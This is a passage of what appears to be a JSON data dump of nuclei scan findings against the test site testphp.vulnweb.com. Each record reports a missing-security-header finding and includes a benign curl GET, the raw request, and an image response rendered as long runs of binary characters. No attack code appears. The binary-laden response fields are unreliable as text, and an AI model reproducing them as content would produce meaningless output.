�\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 925, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:27.607Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 926, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:27.850Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 927, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:28.123Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� 